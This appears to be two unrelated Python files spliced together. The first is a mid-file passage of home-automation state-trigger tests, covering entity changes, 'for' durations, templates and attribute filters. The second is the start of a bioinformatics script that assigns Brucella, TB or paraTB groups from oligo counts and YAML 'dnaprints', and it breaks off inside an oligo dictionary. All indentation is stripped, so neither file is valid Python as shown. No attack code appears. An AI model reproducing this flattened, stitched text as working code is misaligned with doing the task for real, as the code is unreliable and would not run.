hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_action(hass, calls):
"""Test for to action."""
entity_id = "domain.test_entity"
test_state = "new_state"
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": [
{"condition": "state", "entity_id": entity_id, "state": test_state}
],
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set(entity_id, test_state)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set(entity_id, test_state + "something")
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_if_to_boolean_value(hass, calls):
"""Test for setup failure for boolean to."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_if_from_boolean_value(hass, calls):
"""Test for setup failure for boolean from."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_bad_for(hass, calls):
"""Test for setup failure for bad for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"invalid": 5},
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called
async def test_if_not_fires_on_entity_change_with_for(hass, calls):
"""Test for not firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
hass.states.async_set("test.entity", "not_world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_on_entities_change_with_for_after_stop(hass, calls):
"""Test for not firing on entity change with for after stop trigger."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set("test.entity_1", "world_no")
hass.states.async_set("test.entity_2", "world_no")
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_attribute_change(hass, calls):
"""Test for firing on entity change with for and attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set(
"test.entity", "world", attributes={"mock_attr": "attr_change"}
)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_multiple_force_update(hass, calls):
"""Test for firing on entity change with for and force update."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.force_entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
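# The fourth positional argument to async_set is force_update, so setting
# an identical state still emits a state_changed event.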
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
for _ in range(4):
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_without_to(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=2))
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=4))
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_does_not_fires_on_entity_change_with_for_without_to_2(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
for i in range(10):
hass.states.async_set("test.entity", str(i))
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_fires_on_entity_creation_and_removal(hass, calls):
"""Test for firing on entity creation and removal, with to/from constraints."""
# set automations for multiple combinations to/from
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "state", "entity_id": "test.entity_0"},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"from": "hello",
"entity_id": "test.entity_1",
},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"to": "world",
"entity_id": "test.entity_2",
},
"action": {"service": "test.automation"},
},
],
},
)
await hass.async_block_till_done()
# use contexts to identify trigger entities
context_0 = Context()
context_1 = Context()
context_2 = Context()
# automation with match_all triggers on creation
hass.states.async_set("test.entity_0", "any", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context_0.id
# create entities, trigger on test.entity_2 ('to' matches, no 'from')
hass.states.async_set("test.entity_1", "hello", context=context_1)
hass.states.async_set("test.entity_2", "world", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].context.parent_id == context_2.id
# removal of both, trigger on test.entity_1 ('from' matches, no 'to')
assert hass.states.async_remove("test.entity_1", context=context_1)
assert hass.states.async_remove("test.entity_2", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 3
assert calls[2].context.parent_id == context_1.id
# automation with match_all triggers on removal
assert hass.states.async_remove("test.entity_0", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 4
assert calls[3].context.parent_id == context_0.id
async def test_if_fires_on_for_condition(hass, calls):
"""Test for firing if condition is on."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=10)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Time travel 10 secs into the future
mock_utcnow.return_value = point2
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_for_condition_attribute_change(hass, calls):
"""Test for firing if condition is on with attribute change."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=4)
point3 = point1 + timedelta(seconds=8)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Still not enough time has passed, but an attribute is changed
mock_utcnow.return_value = point2
hass.states.async_set(
"test.entity", "on", attributes={"mock_attr": "attr_change"}
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Enough time has now passed
mock_utcnow.return_value = point3
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_for_without_time(hass, calls):
"""Test for setup failure if no time is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "bla"},
"condition": {
"platform": "state",
"entity_id": "test.entity",
"state": "on",
"for": {},
},
"action": {"service": "test.automation"},
}
},
)
async def test_if_fails_setup_for_without_entity(hass, calls):
"""Test for setup failure if no entity is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"event_type": "bla"},
"condition": {
"platform": "state",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
async def test_wait_template_with_trigger(hass, calls):
"""Test using wait template with 'trigger.entity_id'."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": [
{"wait_template": "{{ is_state(trigger.entity_id, 'hello') }}"},
{
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
)
)
},
},
],
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "state - test.entity - hello - world"
async def test_if_fires_on_entities_change_no_overlap(hass, calls):
"""Test for firing on entities change with no overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"
async def test_if_fires_on_entities_change_overlap(hass, calls):
"""Test for firing on entities change with overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"
async def test_if_fires_on_change_with_for_template_1(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ 5 }}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_2(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_3(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "00:00:{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_4(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {"seconds": 5},
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ seconds }}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_from_with_for(hass, calls):
"""Test for firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "stopped")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_on_change_from_with_for(hass, calls):
"""Test for firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 0
async def test_invalid_for_template_1(hass, calls):
"""Test for invalid for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ five }}"},
},
"action": {"service": "test.automation"},
}
},
)
with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called
async def test_if_fires_on_entities_change_overlap_for_template(hass, calls):
"""Test for firing on entities change with overlap and for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": '{{ 5 if trigger.entity_id == "test.entity_1"'
" else 10 }}",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.entity_id }} - {{ trigger.for }}"
},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1 - 0:00:05"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
mock_utcnow.return_value += timedelta(seconds=5)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2 - 0:00:10"
async def test_attribute_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters are match attribute."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_attribute_if_fires_on_entity_where_attr_stays_constant(hass, calls):
"""Test for firing if attribute stays the same."""
hass.states.async_set("test.entity", "bla", {"name": "hello", "other": "old_value"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"attribute": "name",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# Leave all attributes the same
hass.states.async_set("test.entity", "bla", {"name": "hello", "other": "old_value"})
await hass.async_block_till_done()
assert len(calls) == 0
# Change the untracked attribute
hass.states.async_set("test.entity", "bla", {"name": "hello", "other": "new_value"})
await hass.async_block_till_done()
assert len(calls) == 0
# Change the tracked attribute
hass.states.async_set("test.entity", "bla", {"name": "world", "other": "old_value"})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_attribute_if_not_fires_on_entities_change_with_for_after_stop(
hass, calls
):
"""Test for not firing on entity change with for after stop trigger."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
"for": 5,
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# Test that the for-check works
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=2))
hass.states.async_set("test.entity", "bla", {"name": "world", "something": "else"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
# Now remove state while inside "for"
hass.states.async_set("test.entity", "bla", {"name": "hello"})
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_remove("test.entity")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_attribute_if_fires_on_entity_change_with_both_filters_boolean(
hass, calls
):
"""Test for firing if both filters are match attribute."""
hass.states.async_set("test.entity", "bla", {"happening": False})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": False,
"to": True,
"attribute": "happening",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "bla", {"happening": True})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_variables_priority(hass, calls):
"""Test an externally defined trigger variable is overridden."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {"trigger": "illegal"},
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": '{{ 5 if trigger.entity_id == "test.entity_1"'
" else 10 }}",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.entity_id }} - {{ trigger.for }}"
},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1 - 0:00:05"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
mock_utcnow.return_value += timedelta(seconds=5)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2 - 0:00:10"
|
|
#!/usr/bin/env python
import argparse
import gzip
import os
from collections import OrderedDict
import yaml
from Bio.SeqIO.QualityIO import FastqGeneralIterator
OUTPUT_DBKEY_DIR = 'output_dbkey'
OUTPUT_METRICS_DIR = 'output_metrics'
def get_sample_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
return base_file_name
def get_dbkey(dnaprints_dict, key, s):
# dnaprints_dict looks something like this:
# {'brucella': {'NC_002945v4': ['11001110', '11011110', '11001100']}
# {'bovis': {'NC_006895': ['11111110', '00010010', '01111011']}}
d = dnaprints_dict.get(key, {})
for data_table_value, v_list in d.items():
if s in v_list:
return data_table_value
return ""
def get_dnaprints_dict(dnaprint_fields):
# A dnaprint_fields entry looks something like this.
# [['AF2122', '/galaxy/tool-data/vsnp/AF2122/dnaprints/NC_002945v4.yml']]
dnaprints_dict = {}
for item in dnaprint_fields:
# Here item is a 2-element list of data
# table components: value and path.
value = item[0]
path = item[1].strip()
with open(path, "rt") as fh:
# The format of all dnaprints yaml
# files is something like this:
# brucella:
# - 0111111111111111
print_dict = yaml.load(fh, Loader=yaml.Loader)
for print_dict_k, print_dict_v in print_dict.items():
dnaprints_v_dict = dnaprints_dict.get(print_dict_k, {})
if len(dnaprints_v_dict) > 0:
# dnaprints_dict already contains k (e.g., 'brucella'),
# and dnaprints_v_dict will be a dictionary that
# looks something like this:
# {'NC_002945v4': ['11001110', '11011110', '11001100']}
value_list = dnaprints_v_dict.get(value, [])
value_list = value_list + print_dict_v
dnaprints_v_dict[value] = value_list
else:
# dnaprints_v_dict is an empty dictionary.
dnaprints_v_dict[value] = print_dict_v
dnaprints_dict[print_dict_k] = dnaprints_v_dict
# dnaprints_dict looks something like this:
# {'brucella': {'NC_002945v4': ['11001110', '11011110', '11001100']}
# {'bovis': {'NC_006895': ['11111110', '00010010', '01111011']}}
return dnaprints_dict
def get_group_and_dbkey(dnaprints_dict, brucella_string, brucella_sum, bovis_string, bovis_sum, para_string, para_sum):
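# The group is chosen from the summed raw oligo counts: more than 3 total
# Brucella or TB oligo matches selects that group, while a single paraTB
# match is enough for paraTB.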
if brucella_sum > 3:
group = "Brucella"
dbkey = get_dbkey(dnaprints_dict, "brucella", brucella_string)
elif bovis_sum > 3:
group = "TB"
dbkey = get_dbkey(dnaprints_dict, "bovis", bovis_string)
elif para_sum >= 1:
group = "paraTB"
dbkey = get_dbkey(dnaprints_dict, "para", para_string)
else:
group = ""
dbkey = ""
return group, dbkey
def get_oligo_dict():
oligo_dict = {}
oligo_dict["01_ab1"] = "AATTGTCGGATAGCCTGGCGATAACGACGC"
oligo_dict["02_ab3"] = "CACACGCGGGCCGGAACTGCCGCAAATGAC"
oligo_dict["03_ab5"] = "GCTGAAGCGGCAGACCGGCAGAACGAATAT"
oligo_dict["04_mel"] = "TGTCGCGCGTCAAGCGGCGTGAAATCTCTG"
oligo_dict["05_suis1"] = "TGCGTTGCCGTGAAGCTTAATTCGGCTGAT"
oligo_dict["06_suis2"] = "GGCAATCATGCGCAGGGCTTTGCATTCGTC"
oligo_dict["07_suis3"] = "CAAGGCAGATGCACATAATCCGGCGACCCG"
oligo_dict["08_ceti1"] = "GTGAATATAGGGTGAATTGATCTTCAGCCG"
oligo_dict["09_ceti2"] = "TTACAAGCAGGCCTATGAGCGCGGCGTGAA"
oligo_dict["10_canis4"] = "CTGCTACATAAAGCACCCGGCGACCGAGTT"
oligo_dict["11_canis"] = "ATCGTTTTGCGGCATATCGCTGACCACAGC"
oligo_dict["12_ovis"] = "CACTCAATCTTCTCTACGGGCGTGGTATCC"
oligo_dict["13_ether2"] = "CGAAATCGTGGTGAAGGACGGGACCGAACC"
oligo_dict["14_63B1"] = "CCTGTTTAAAAGAATCGTCGGAACCGCTCT"
oligo_dict["15_16M0"] = "TCCCGCCGCCATGCCGCCGAAAGTCGCCGT"
oligo_dict["16_mel1b"] = "TCTGTCCAAACCCCGTGACCGAACAATAGA"
oligo_dict["17_tb157"] = "CTCTTCGTATACCGTTCCGTCGTCACCATGGTCCT"
oligo_dict["18_tb7"] = "TCACGCAGCCAACGATATTCGTGTACCGCGACGGT"
oligo_dict["19_tbbov"] = "CTGGGCGACCCGGCCGACCTGCACACCGCGCATCA"
oligo_dict["20_tb5"] = "CCGTGGTGGCGTATCGGGCCCCTGGATCGCGCCCT"
